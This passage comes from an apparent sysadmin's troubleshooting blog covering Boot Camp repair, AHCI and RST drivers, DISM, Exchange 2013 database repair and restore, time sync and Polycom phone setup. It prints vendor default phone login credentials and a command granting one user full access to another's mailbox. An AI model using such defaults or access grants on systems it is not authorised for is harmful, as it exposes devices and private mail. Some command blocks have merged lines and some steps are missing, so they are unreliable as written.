-through holding the OPTION key on boot up (after chime).
-boot into OSX and go to SYSTEM-PREFERENCES and choose the START-UP DISK.
-you will see "No boot device" or Windows is going into repair mode on it's own.

In either case, the following will work as a full instruction set. Adjust as needed.

-insert Windows 7/8 cd/usb (or a Windows repair disk).
-boot while holding OPTION key.
-wait for windows 7 cd/usb shows (it could take a minute).
-select Windows 7.
-click NEXT.
-select REPAIR YOUR COMPUTER (bottom left).
-click NO (for automatic repair).
-click NEXT (at bottom right).
-click COMMAND PROMPT.
-type: bootrec /scanos.
(If it isn't already there, it should find the WINDOWS installation and ask if you want to add it.)
-type: Y

-type: Diskpart
-type: LIST DISK
-type: SELECT DISK 0 (change this to the number of the disk . most likely 0)
-type: LIST PARTITION
-type: SELECT PARTITION 4 (change this to your partition number. most likely 4)
-type: DETAIL PARTITION
(it will show the details of the partition. We're trying to find the partition with the windows installation.)
-if you found it, it will probably say ACTIVE: NO
-type: ACTIVE
-type: EXIT

-type: bootrec /fixmbr (needed?)
-type: bootrec /fixboot (needed?)
-type: bootrec /rebuildbcd
-type: exit
-click RESTART

CHECKDISK
-when it restarts it will do a chkdsk.
-let it finish.
-it will reboot.
-voila! You can bootcamp Windows!

For diagnostic information, this is provided.

-boot to osx
-open terminal
-type: diskutil list
-type: sudo gpt -r -vv show disk0
-type: sudo fdisk /dev/disk0

DEFINITIONS
boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders)
boot loader: load an OS kernel and hand off control of the computer to that kernel.

/--bl-->k-->osx
bm--|--bl-->k-->centos/rhel
\--bl-->k-->win7/8/10

NOTES:

## Intel Rapid Storage Technology (RST) (IRST)

I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed along with the settings and the difference between the drivers and the software but this post does a better job than I ever would be able to (as well as better explanation than Intel does too):

I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc) which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER) and that the CHIPSET drivers are driving the northbridge (X58, etc).

Also, I will say that the speed of the SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed is by using CPUID or HWINFO.

Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers.

Here's how:

• 1 -if you are in IDE mode, change to AHCI mode:
For Windows 7, change the registry. In cmd (as admin), type: echo y | reg add "HKLM\System\CurrentControlSet\Services\Msahci" /v Start /d 0
For Windows 10, set to boot into safe mode with msconfig. You will need your local admin password, no domain or Microsoft accounts can access safe mode.
• 2 -reboot
• 3 -In the bios, the SATA drive should be set to AHCI (not IDE).
Dell systems automatically are set to RST/RAID. I guess so that it is flexible in case someone wants to setup a RAID, they can without too much difficulty. Also, there is a little boost in performance. I have witnessed the extremely slow systems due to incorrect RST drivers, even on new systems. The RST drivers need to be updated as this is can be a limiting factor. In some cases (Optiplex/Inspirion All in One pc's), Dell is not providing updated RST drivers and you must source them from Intel.
• 4 -reboot.
For Windows 10, set to boot into normal mode with msconfig.
• 5 -reboot.

NOTES:
-https://support.microsoft.com/en-us/help/922976/
-SSD's should be set to RAID/RST as there will be a little boost in performance.
-ICH10R can only go to RST v11.
-as of this writing the RST v15 is the newest.
-you will need a couple of reboots, in case you couldn't tell.

## Quickbooks 2011 on Mac El Capitan

Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC. QUICKBOOKS 2011 will work fine.

In the spirit of "just fix it" here's how:

## Windows Package Manager

You're familiar with RPM. Windows has a similar package manager. Windows has something similar for Windows packages only.

It should be called WPM for Windows Package Manager but it's called DISM for Deployment Image Servicing and Management.

<tirade>Can they not come up with something all by themselves that works? Must they continuously ripoff open-source projects and change a certain percentage so that they can get around law? Then be so terrible at implementation that it would be graded as a D project?</tirade>

Show all Windows packages:

dism /online /get-packages /Format:Table

Find if a certain package is installed:

dism /online /get-packages |findstr KB2919355

Remove package:

Scan to see if there is corruption:

dism /online /cleanup-image /scanhealth

Report if there is corruption:

dism /online /cleanup-image /checkhealth

Repair if there is corruption:

dism /online /cleanup-image /restorehealth

Restore to a source image:

dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess

Remove old versions of packages:

dism /online /cleanup-image /startcomponentcleanup

Lock in all packages and service-package so that they cannot be uninstalled:

dism /online /cleanup-image /startcomponentcleanup /resetbase

Check to see if you have bad sectors on a disk:

• -use HDTUNE

This will give a graphical representation of any bad sectors on the disk. It will mark it as red.

If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9 then most likely the issue will grow. More bad sectors will show and then the drive will become useless.

Fix bad sectors on a disk:

• -use UBCD > HDD > DIAGNOSTICS > HDAT2
• -type: HDAT2
• -select the disk by using the arrows keys on keyboard.
• -hit ENTER.
• -select VERIFY/WRITE/VERIFY
• -let it run all the way through.

In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired.

Cloning can be done with Clonzilla or many other tools. I prefer DDRESCUE as in this article.

Again, there are so manu tools in this area like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc that it's hard to know what to use and what not to bother with. The above reference of:

• HDTUNE
• HDAT2
• DDRESCUE

is a good start. I wish I retained all the info I've learned and used in the past but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them!

## Dell Optiplex Wake On Lan Doesn't Work

Dell Optiplex Wake On Lan doesn't work even though the Wake On Lan setting is enabled.

### SOLUTION

This is because the DEEP SLEEP setting is ENABLED in the BIOS.

• -enter BIOS.
• -expand POWER-MANAGEMENT.
• -click DISABLED.
• -click SAVE.

If that doesn't work, make sure the BIOS is the newest version.

## Polycom Phone Set is "Not Registered"

A Polycom Phone Set (Fonality) is saying NOT REGISTERED in the http://cp.fonality.com
(
I guess this could be any Polycom Phone Set and Asterisk.)

Basically, the EXTENSION PASSWORD has to be typed into the PHONE SET. Here's how:

• -open CP.FONALITY.COM
• -click USERS/EXTENSION > VIEW USERS (at the top).
• -click the EXTENSION you need to fix.
• -expand the EXTENSION section (at the bottom).
• -find SIP PASSWORD (on the right).
• -click SHOW

This should show you the SIP PASSWORD which will be a random set of letters and numbers.

• -find the IP of the phone set you want to change.
• -login to that phone set via a web browser.
• -USER: Polycom (case-sensitive) (or possibly there is no USER).
• -PASS: 456 (or possibly the Fonality default password of: 9418941962).
• -click LINES (or possibly SIMPLE-SETUP > SIP LINE IDENTIFICATION)
• -USER: should be the MAC of the phone (do not change this if something is already there).
• -type in the password that it showed from the first section.

What threw me for a loop here is that the first time around, the SIP PASSWORD section wasn't showing. If the SIP PASSWORD section doesn't show:

• -click APPLY ALL CHANGES (at the bottom) (yes, without changing anything).
• -afterwards, the section should show.

### UPDATE

If you have to manually do this:

-cd /tftpboot
-changed the <mac>.cfg to refer the newest *.ld file
-ensure that the user is in the /etc/asterisk/sip.conf file. (case-sensitive)
-changed the <mac>-reg-basic.cfg to use the username/password that is in the sip.conf file. (case-sensitive)
-change the polycom.UC4.1.8.device-<site>.cfg to TFTP from the local server (rather than FTP to the hq server).

NOTES:
-the <mac>.cfg should just have the rest of the *.cfg files.
-the <mac>-reg-basic.cfg will have the setting for the phone-set to make calls.
-the <mac>-features.cfg will have the features of the phone such as background, volume, etc
-the <mac>-phone.cfg will have the phone overrides. Settings set by changing the settings on the phone set itself.
-the <mac>-web.cfg will have the web overrides. Settings set by changing the settings on the web site itself.
-the polycom.UC4.1.8.device-<site>.cfg will have the FTP/TFTP settings.

You're awesome!

## Redirect HTTP to HTTPS in Exchange 2013

You have an EXCHANGE 2013 server.

This web site works: https://mail.domain.tld

This web site does not work: http://mail.domain.tld

You get an error message:
"HTTP ERROR 403.3 - Forbidden. The page you are tryig to acces is a secured with Secure Sockets Layer (SSL)."
or
"Server Error: 403 - Forbidden: Access is denied."

Here's how to fix:

• -open SERVER-MANAGER
• -click TOOLS > INTERNET INFORMATION SERVICES MANAGER (IIS)
• -expand SERVER > SITES > DEFAULT-WEB-SITE
• -click ERROR PAGES (in the middle).
• -click ADD (on the right).
• -type: 403.4 (in STATUS CODE).
• -bullet RESPOND WITH A 302 REDIRECT
• -type: https://mail.domain.tld
• -click OK.

First of all, this can happen for many reasons. However, in my experience, this happens because the web site is required to have HTTPS and not HTTP. What is amazing here is a perfect scenario of different people groups think differently. Accordingly, the amount of mis-information on this is mind-boggling and complex.

For example, one MS article recommends to turn off SSL:
https://support.microsoft.com/en-us/kb/2839692

Ummm, that's a big NO. Recommending to do so is simply irresponsible.

Others recommend a complex setup for a URL-REWRITE, like this

Ummm, that's also a big NO.

Others recommend to do a HTTP REDIRECT on the OWA section of the web site:
https://www.itsupportguides.com/exchange-2010/exchange-2010-outlook-web-access-error-403-access-is-denied/

Ummm, that's also a big NO. In fact, doing so will kill access to EXCHANGE altogether.

Like usual, the only way I found to handle this was through a comment on a random blog article here:
https://www.sslshopper.com/iis7-redirect-http-to-https.html

## Exchange 2013 EDB File Repair and Restore

Messing around with EXCHANGE 2013 EDB files can be tricky. It's best to have a plan before you start typing in commands. Here's my cheat-sheet.

### REPAIR THE EDB FILE & MOUNT RECOVERY EDB

Again from last time, you can do this with StorageCraft. Paying the license is worth the hassle it saves and more affordable than dealing with MS SUPPORT.

MAKE A COPY OF THE EDB & THE LOG FILES
I don't care how you do it, just do it. If it takes 2 hours to do, then wait the 2 hours for the copy to happen. If you have to run to the store to buy a spare HD, then run to the store. !!!DO NOT BE CARELESS WITH THE EDB FILE!!! Rather, perform your work on a working-copy.

$cd e:\exchange-repair\working-copy CHECK TO SEE THE STATE$eseutil /mh '.\Mailbox Database FOO.edb'

SOFT RECOVERY
$eseutil /r E00 /l E:\exchange-repair\working-copy /d E:\exchange-repair\working-copy CHECK TO SEE THE STATE$eseutil /mh '.\Mailbox Database FOO.edb'

HARD RECOVERY (IF NECESSARY)
$eseutil /p '.\Mailbox Database FOO.edb' (!!!CAUTION!!!: performing this will render the database with data loss.) CONNECT THE RECOVRY DATABASE$New-MailboxDatabase -Server exchange-server-name -Name RecoveryDB -Recovery -EdbFilePath 'E:\exchange-repair\working-copy\Mailbox Database FOO.edb' -LogFolderPath 'E:\exchange-repair\working-copy\recoverylogs'

DISMOUNT THE CURRENT RECOVERY DATABASE
$dismount-database RDB (There can only be 1 recovery database mounted at any one time. There can be more than 1 recovery datase connected. See the difference between CONNECTED & MOUNTED? MOUNT THE RECOVERY DATABASE$Mount-Database RecoveryDB

### CHECK THE STATS OF THE RECOVERY DATABASE

CHECK THE STATS OF THE ENTIRE RECOVERY DATABASE
$Get-MailboxStatistics -Database RecoveryDB | ft -auto CHECK THE STATS OF THE CURRRENT USER-MAILBOX$Get-MailboxStatistics foo.user

CHECK THE STATS OF THE RECOVERY USER-MAILBOX
$Get-MailboxStatistics -Database RecoveryDB | where mailboxguid -eq 24b5b78e-9396-456f-9ece-a5acaeb3e3e7 ### RESTORE MAILBOX FROM A RECOVERY DATABASE The RESTORE requires DisplayName, MailboxGUID, or LegacyExchangeDN. The most exact is the MAILBOXGUID since the DisplayName can be lengthy with spaces. GET THE MailboxGUID:$Get-MailboxStatistics -Database RecoveryDB | ?{$_.DisplayName -like 'FirstNameHere*'} | fl DisplayName,MailboxGuid,DisconnectDate It will spit out the mailbox accounts that match along with the GUIDs. RESTORE THE RECOVERY USER-MAILBOX$New-MailboxRestoreRequest -SourceDatabase RecoveryDB -SourceStoreMailbox 28282f8e-e37b-4965-9dea-4e8658fada43 -TargetMailbox foo.user -AllowLegacyDNMismatch

-see the status of all the requests:
$Get-MailboxRestoreRequest -see detail status of individual request:$Get-MailboxRestoreRequestStatistics -Identity "foo.user\MailboxRestore"

-see the detail status of all the requests:
$Get-MailboxRestoreRequest | Get-MailboxRestoreRequestStatistics -the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.$Remove-MailboxRestoreRequest -Identity "foo.user\MailboxRestore"

-or remove all the completed requests:
$Get-MailboxRestoreRequest -Status Completed | Remove-MailboxRestoreRequest ### IMPORT A PST INTO THE EDB Sometimes a user has the pst from their laptop and you can import that pst back into the edb. Don't worry, by default it doesn't duplicate items. First, enable the import/export of .pst into a mailbox as it is not turned on by default:$New-ManagementRoleAssignment -Role "Mailbox Import Export" -SecurityGroup "Organization Management"
-restart EMS (this means shut down your powershell and open it back up ;-))

-import a PST file into a user's primary mailbox
(NOTE: By default, the import checks for duplication of items and doesn't copy the data from the .pst file into the mailbox or archive if a matching item exists in the target mailbox or target archive.)
-you have to use the new-mailboximportrequest command. It requires UNC path (eg: \\exchange-server\foo-folder$). It will not work with an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight. -create an easy folder (i.e.: c:\foo-folder\) -share the folder as a hidden share by putting a dollar-sign ($) behind the name (foo-folder$). -grant full-access to 'exchange trusted subsystem' (NTFS and Share permissions) -import the pst:$New-MailboxImportRequest -FilePath \\exchange-server\foo-folder$\Recovered.pst -Mailbox foo.user -see the status of the import request:$get-mailboximportrequest

-see the details of the import request:
$Get-MailboxImportRequestStatistics -Identity foo.user\mailboximport -the request hangs around until you stop it. They are not automatically cleared. Only run this when the request is complete.$Remove-MailboxImportRequest -Identity "foo.user\MailboxImport"

-or remove all the completed requests:
$Get-MailboxImportRequest -Status Completed | Remove-MailboxImportRequest ### SEE MOVE REQUESTS Hopefully, the syntax is becoming clearer. Let's see if you know what this is...$Get-MoveRequest
$Get-MoveRequest |$Get-MoveRequestStatistics
$Get-MoveRequest -MoveStatus Completed | Remove-MoveRequest ### EXPORT PST FROM EDB If for some reason you need to export a pst from the edb, you can do that too. Again, it can only be done to a UNC (eg: \\exchange-server\foo-folder$). It cannot be done to an absolute path (C:\foo-folder\recovered.pst). Definitely an oversight.

$New-MailboxExportRequest -Mailbox foo.user -FilePath "\\exchange-server\recovery$\foo.user.recovered.pst"
$Get-MailboxExportRequest$Get-MailboxExportRequest | Get-MailboxExportRequestStatistics
$Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest ### MAILBOX REPLICATION SERVICE (MRS) Throttling is done by the MRS. It it configured here: C:\Program Files\Microsoft\Exchange Server\V15\Bin\MsExchangeMailboxReplication.exe.config Do not try to mass import/export/move, unless you know what you are doing. The default settings for the MRS will most definitely bite you. The processes will error out and eventually die after 12 hours. I wouldn't do more than 20 at a time. There's too many switches. Basically, the more you do at a time, the more resources it takes. The more resources it takes, the longer it takes. If you hit 12 hours, the request stalls. Yes, you can configure all of these settings if you really want to. This is the best resource for more info: http://thoughtsofanidlemind.com/2014/09/29/exchange-2013-workload-management-controls-mailbox-replication-service/ ### NOTES • Transferring from EDB into an empty mailbox is preferred. In my experience, it is much better. In my experience, mailbox to mailbox misses items and pst to mailbox misses items too. • If you can, import into a dummy mailbox account so that you can test and approve the contents before you import it into the real mailbox. ## Network Node Central Management What can I say? • PDQ • Lansweeper • LogicNow • Matrix42 ## Exchange 2013 Failed to Mount Database ### MY EXPERIENCE Ughhh.... Users report that they can't access their email. Message is, "Microsoft.Exchange.Data.Stoarage.MailboxOfflineException" Ok, so the Mailbox is offline. Why is it offline? The database for the Exchange 2013 is broken into 3 different groups. • A-H • I-P • Q-Z Databases I-P & Q-Z are working fine but database A-H won't mount. Why won't it mount? It won't mount because it is corrupt. How did it get like this? It got like this because EXCHANGE 2013 uses EDB files. It is a single file that stores everything. This file grows. Sooner or later it craps out. I'm not sure why but my guess is on NTFS. If I check the EVENT LOG > APPLICATION, I see, "Active Manager failed to mount the database Mailbox A-H. Error: An Active Manager operation failed. Error: The database action failed. Error: Operation failed with message: MapiExceptionDatabaseError: Unable to mount database. (hr=0x80004005, ec=1108)" It gets worse, I'm also getting: "Microsoft Exchange Information Store worker process (18152) has encountered and unexpected database error (Disk IO error) for database Mailbox A-H with a call stack of..." And still worse: "Database copy Mailbox A-H on this server appears to have a serious I/O error." "Service recovery was attempted by failover to another copy. Failover was unsuccessful in restoring the service. Error: There is only one copy of this mailbox database. Automatic recovery is not available." And worse: "Information Store - Mailbox A-H ; Database recovery/resotre failed with unexpected error - 1022" And worse: "Information store - Mailbox A-H: An attempt to write to the file "C:\Program Files\Microsoft\Exchange\V15\Mailbox\Mailbox Database 1889704935\Mailbox Database 1889704935.edb" at offset... bytes failed after 0.000 seconds with system error 665. The requested operation could not be complete due to a file system limitation. The writer operation will fail with error - 1022. If this error persists then the file may be damaged and may need to be restored from a previous backup." All of this to say that the database is corrupt. We got 2 options: 1. restore from backup. 2. repair database. To repair: • cd \ • cd \Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Foo\ • eseutil /mh ".\database-name.edb" • eseutil /p ".\database-name.edb" /g Then I moved all the log files away from Exchange log folder. First create a backup-directory, then move all the files into the backup-directory: • mkdir bkp • move * bkp Then move the database-file.edb back where it came from: • cd bkp • move database-name.edb ..\ Now defrag the database-file.edb: • eseutil /d database-file.edb Now check to see if the database-file.edb is OK: • eseutil /mh ".\database-name.edb" Finally, mount the database: •$Mount-Database "database-name"

NOTE: you can run eseutil.exe /mh without effect. It is informational only.

In the end, it was easier to create a new database-name.edb and import the items needed via edbmails. Don't ask me why it took more than 24 hours to get to a solution that should have been the first option. This is exactly why I keep a note of items here.

### MS SUPPORT

Luckily, I called MS support. So you get the short of the conversation without having to pay ;-)

-too many log files.

-database file is too large. It is 539GB.

-ran eseutil /mh ".\database-name.edb"

-stop MS Exchange Information Store

-uninstall Veeam Backup

-get-mailboxdatabase

-get-mailboxdatabasecopystatus *

-wait for the databases to mount.

-shows "Dismounted"

-event-viewer > application and they see the same errors I already found.

-uninstall some programs that might be accessing the file.

-ran eseutil /mh ".\database-name.edb"

-error 1032. This means it's being used somewhere.

-storagecraft was trying to mount it.

-stop storagecraft service

-ran ran eseutil /mh ".\database-name.edb"

-success

-see that the log-required is lengthy

-sequence is from E000015CD80 to E000015CDCF

-created new folder & moved the sequence into this new folder

-ran eseutil /ml ".\database-folder\new folder\E00"

-"no damaged log files were found"

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /a

-ran eseutil /r E00 /d ".\database-name\new folder" /l "new-folder" /S "new-folder" /i

-ran eseutil /mh ".\database-name.edb"

### NEW PLAN

-copy the database-name.edb

-start a new database-name.edb (this will get everyone receiving email)

-repair the database-name.edb

-merge the file back into the new-database-name.edb

INFO GATHER

-repair is 5-6GB per hour

-ran eseutil /p ".\old-database-name.edb"

-merge into new-database-name.edb

[PS] c:\users\admin> cd "C:\Program Files\Microsoft\Exchange Server\V14\Bin"

[PS] C:\Program Files\Microsoft\Exchange Server\V14\Bin>eseutil /r E00 /i /l 'Y:\ExchangeRestore\Mailbox Database' / 'Y:\ExchangeRestore\Mailbox Database'

FINDINGS

StorageCraft to the rescue again with Granular Recovery for Exchange.

Testing it out now...

OK, I'm back. The StorageCraft GRE is a good tool. It does what eseutil should do but makes it easy for the stressed out administrator. It also has the added benefit of having granular restore. You can restore just one email.

If you have the budget, I recommend it. It's way better than EDBMAILS and other software I've tried.

## Setting Windows Time - w32tm

Here's how this goes. There should only be one NTP SERVER on the network. You can have more but it would be redundant.

### SERVER / NON-DOMAIN COMPUTERS

The domain-server should be set to sync with an external source.

• $w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update •$stop-service w32time
• $sc stop w32time •$start-service w32time
• $sc start w32time ### DOMAIN COMPUTERS The domain-clients should automatically get their time from the server. If for some reason, a domain-client doesn't, then force it: • -open POWERSHELL (as admin) •$w32tm /config /syncfromflags:domhier /update
• $stop-service w32time •$sc stop w32time
• $start-service w32time •$sc start w32time

### HYPER-V MANAGER

If it is a VIRTUAL-OS, disable TIME-SYNCHRONIZATION from the HYPER-V settings:

• -open HYPER-V MANAGER
• -click on the VM
• -click SETTINGS (on the right-hand side)
• -scroll down to INTEGRATION SERVICES
• -uncheck TIME-SYNCHRONIZATION
• -click OK

You can check to see if a NTP Server is working.

### If it's a VIRTUAL-HOST,

• -check to see if an external NTP server is working.
• -if you get an error, check to see if an internal NTP server is working.
• -set the server to a working NTP server
• External: $w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update • Internal:$w32tm /config /syncfromflags:manual /manualpeerlist:192.168.1.1 /reliable:yes /update

### You can check the config:

• $w32tm /query /configuration •$w32tm /query /status
• $w32tm /query /source • External-check:$w32tm /monitor /computers:pool.ntp.org
• Internal-check: $w32tm /monitor /computers:192.168.1.1 Some recommend (I have not tried this): • -force the VIRTUAL-HOST to use an external source via regedits • (HKLM/SYSTEM\CURRENTCONTROLSET\SERVICES\W32TIME\TIMEPROVIDERS\NTPSERVER\ENABLED: 1) • -set the external:$w32tm /config /syncfromflags:manual /manualpeerlist:"0.pool.ntp.org 1.pool.ntp.org 2.pool.ntp.org 3.pool.ntp.org" /reliable:yes /update
• $stop-service w32time •$start-service w32time
• -then set the VIRTUAL-OS to use the internal VIRTUAL-HOST: $w32tm /config /syncfromflags:manual /manualpeerlist:192.168.1.1 /reliable:yes /update • (rather than through INTEGRATION SERVICES) •$stop-service w32time

### GFI Max

$12 per computer annually &$150 per server annually.

### Continuum

$15 per computer annually &$175 per server annually or little higher than GFI Max is all I found. But they have an interesting white label tech support with 24 hour availability.

### LabTech

Can't find much but I know it's similar to those above. Price per node per month.

## Windows Profile Always Loads Default Profile (Or Temporary Profile)

Windows Profile Always Loads Default Profile (Or Temporary Profile).

How to fix:

• -click START > RUN > REGEDIT
• -browse to: HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Profilelist/
• -find profile that isn't working.
• -you might find duplicate profile in this area. The new one is being loaded with nothing in it. The old one may have .bak at the end.
• -add .old to end of incorrect profile.
• -removed .bak from end of correct profile.
• -go to the profile not working (only if needed).
• -changed refcount from 1 to 0 (only if needed).
• -changed state value from 33024 to 0 (only if needed).
• -restart and login to the user account.

That's it!!! You're hired!

## NiNite et al

A list of tools that I want to use and some I've never knew of:

• -vi
• -putty
• -solarwinds stuff
• -ninite
• -powershell/cmd
• -hirens
• -ubcd
• -knoppix
• -MRAT
• -mremoteng
• -nagios/prtg/zabbix
• -devolutions-remotedesktopmanager
• -leatherman
• -wire-tester/toner-probe
• -lansweeper

### product

• veeam
• sonicwall/watchguard
• virus/spyware/malware
• printer setup/service
• server management
• desktop management
• esxi free, hyperv, xenserver
• wireless setup
• lan/wan design & implementation
• remote support
• break/fix
• contract support/managed-service-provider

## 727-777-5827 is a Scam

If 727-777-5827 is a scam. Here's the short version:

• -got a phone call from 727-777-5827.
• -automatic message.
• -press 1 to speak to local representative.
• -"Hi, who is this?" I asked.
• -"Gene."
• -"Who are you with?"
• -"SEO INC."
• -"Where are you located?" I asked.
• -"Southern California."
• -"That's not very local." I stated.
• -They hung up.

## Firewalls

I have experience with many firewalls.

• -SonicWall
• -WatchGuard (FireBox).
• -DDWRT/BusyBox.
• -PFSENSE.
• -Untangle.
• -anything Linux/Unix with IPTABLES.

What's funny is that one time a CFO starting asking me questions about the firewall because they allowed a KEY-LOGGER onto one of their accounting systems and because of their poor choice in banks it logged the USERNAME and PASSWORD to the web site that allows them to do WIRE TRANSFERS.

Funny.

Still at some level, a point can be derived that not all firewalls are the same. The general idea is that you want to block/allow access to certain items at a network level rather than at a desktop level. You are trying to block incoming items at that network level.

To the network administrator, this can be seen as blocking/allowing the ports needed and directing them where they need to go.

To a client, this is blocking everything bad in the universe from getting on the local machine. So if the person in accounting is playing games, clicks on a link in a spam email and downloads something harmful, this is a result of the firewall not being strong enough and not a result of the person in accounting.

Nor is it the fact that they were trying to save money by going with a less than average bank who ALLOWS WIRE TRANSFERS BY A SIMPLE USERNAME AND PASSWORD!!! ARE YOU OUT OF YOUR MIND!!!

Still firewalls can be used to keep people from harming themselves by blocking some types of files. From this point, you'll have to manage the fine balance of allowing items through to make work flow and block evil stuff all at the same time.

Here is the Polycom Phone Set Password:

PHONE SETS:
USER: Polycom
PASS: 9418941962

You can apply this to the other Polycom articles in this blog.

Again, what's interesting is that some of the settings have to be set via the phone set itself and some of the settings have to be set via the server.

In this particular case, I wanted to display the EXTENSION instead of the NAME. This is set via the phone config rather than via the server config.

## View User's MailBox in Exchange 2013

Let's say you want to view a user's mailbox in Exchange 2013. Here's the trick:

This will get you into their mailbox. If you don't have permission, it will say, "You don't have permission to open this mailbox."

To fix this, you'll have to go into the powershell and type:

• Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

You can view but you can't send mail as them. You have to go one step further:

## DDPE Recovery

So let's say you have DDPE encrypting the full drive. The drive won't boot. Now you can access your computer and the files you can access are encrypted so you can't read them. What do you do?

Well if you have the encryption keys, you'll be able to retrieve the documents with a set of tools from Dell called the DDPE Administrative Utilities.

• -build a WINDOWS PE disk from a working computer (how to do this is outside the scope of this document).
• -copy over the DELL WINDOWS RECOVERY KIT (really what we need are the unzipped OFFLINE TOOLS, more specifically the cmgau.exe. See below.)
• -copy over the encryption keys (It'll say something like LSARecovery_machine-name-here.exe).
• -boot from the USB
• -exit out of OPAL SED
• -at the command prompt go to e:\dell-offline-admin-32bit-version-number-here\
• -type: cmgau.exe -o
• -type in the directories you want decrypted.
• -point to the LSARecovery_machine-name-here.exe
• -type in the PASSWORD for the LSARecovery_machine-name-here.exe

The process with decrypt the DDPE directories that you specified. You will have to wait for it to decrypt and then transfer those documents over to a working drive.

## OpenVPN and Mac Client

I'm in a situation where I need to use OPENVPN on a Mac. This requires an OPENVPN MAC CLIENT.

So my natural question progression is this...

Q: Can I use the built-in VPN client on the MAC?
A: Because OPENVPN uses a different mechanism than what's built into MAC OS X, a software package is required. This mechanism is called a kernel extension or kext. The kext that is needed is either TUN or TAP. Since you need a kext, you need to install a software package.

Q: What software package is needed then?
A: There are a few options:

Q: What is recommended?A: It seems everyone tends to use Tunnelblick.

## Personal Email Certificates for Outlook - Digital Signature

A PERSONAL EMAIL CERTIFICATE is a certificate that verifies that the email is from the original author and that the email message isn't altered. This is like a seal on an real message. That seal might be a wax spot with a unique marking. The seal doesn't prevent someone from reading the message (this is the job of encryption). All someone has to do is open the message. What the seal does, it that it ensures that the message is verified from the author and that the message hasn't been altered.

There are several places to get PERSONAL EMAIL CERTIFICATES. MOZILLA helped in identifying some of those places here:
http://kb.mozillazine.org/Getting_an_SMIME_certificate

After about a minute of searching, I figured the best route to go was with COMODO as it's free. I can afford free.

### Export the Personal Email Certificate

The issue here is that we need it installed on the OS SYSTEM (not in the BROWSER).

• -click FIREFOX > PREFERENCES > ADVANCED (on the left-hand side) > CERTIFICATES (at the top).
• -click VIEW CERTIFICATES (at the bottom).
• -click YOUR CERTIFICATES (at the top).
• -click BACKUP (at the bottom).
• -save the certificate to your DESKTOP.
• -type in a password so it can't be used elsewhere.
• -it should save it as something like "foo.p12"

Great! You have the certificate on your system. Now we have to install it.

### Install the Personal Email Certificate on MAC OS X (not needed on Windows 10)

Let's install the Personal Email Certificate.
(FYI - this is for a MAC OS X system.)

• -click GO > UTILITIES > KEYCHAIN ACCESS
• -click FILE > IMPORT ITEMS (at the top menu).
• -select the file "foo.p12"
• -select LOGIN (next to "Destination Keychain").
• -click OPEN.
• -type in the password for the certificate.
• -type in the password for the keychain (if required).

That's it! It should save the certificate in the correct spot.

### Get OUTLOOK to Use the Personal Email Certificate

Now we have to get OUTLOOK to use the Personal Email Certificate.

This is for a MAC OS X system / OUTLOOK 2011:

• -click TOOLS (at the top) > ACCOUNTS > ADVANCED (at the bottom).
• -click SECURITY (at the top).
• -find the top section called DIGITAL SIGNING.
• -click SIGN OUTGOING MESSAGES.
• -click OK (at the bottom).

This is for WINDOWS 10 / OUTLOOK 2016:

•  -open OUTLOOK 2016
• -click FILE > OPTIONS
• -click TRUST-CENTER (on the left-hand side).
• -click TRUST-CENTER-SETTINGS (bottom-right).
• -click EMAIL-SECURITY (left-hand side).
• -find DIGITAL-ID'S (CERTIFICATES) section
• -click IMPORT/EXPORT
• -find the .p12 file.
• -type in the password that you created for the file.
• -click OK.
• -checkmark ADD DIGITAL SIGNATURE TO OUTGOING MESSAGES.
• -click OK > OK.

That should do it! Your certificate is installed and people will get a little cool lock that indicates that email messages from you are really yours. This gives confidence to your readers that you are who you say you are and that you really are smart and conscience about security! Good job!

## Exchange 2013: Blank Page After Login | An error occurred while using SSL configuration for endpoint 0.0.0.0:444

As title says, blank page after login to the EAC. Or the OUTLOOK clients can't connect. Or the IPHONE clients can't connect. Or the Exchange Management Shell Fails to connect.

Looking in the WINDOWS-LOGS > SYSTEM, I see, "An error occurred while using SSL configuration for endpoint 0.0.0.0:444."

This happens because EXCHANGE screwed up its binding to the SSL CERTIFICATE.

First, make sure you know what SSL CERTIFICATE the EXCHANGE should be using. You can see a list of SSL CERTIFICATES in IIS:

• -open IIS MANAGER.
• -click SERVER CERTIFICATES.

You want to make sure that it is issued by a TRUSTED SOURCE (like GoDaddy, GlobalSign, Comodo, Symantec). Also, make sure that all the appropriate alternative names are in the certificate (like autodiscover., computer-name., www., mail., webmail., null)

Once you know what certificate that you want to use.

• -open IIS MANAGER.
• -browse to the "Exchange Back End" website.
• -click Bindings (on the right-hand side).
• -mark the "https" binding (normally on port 444) and click Edit...
• -change to the correct certificate.
• -click OK > CLOSE.
• -click server name (on the left-hand side).
• -restart IIS.

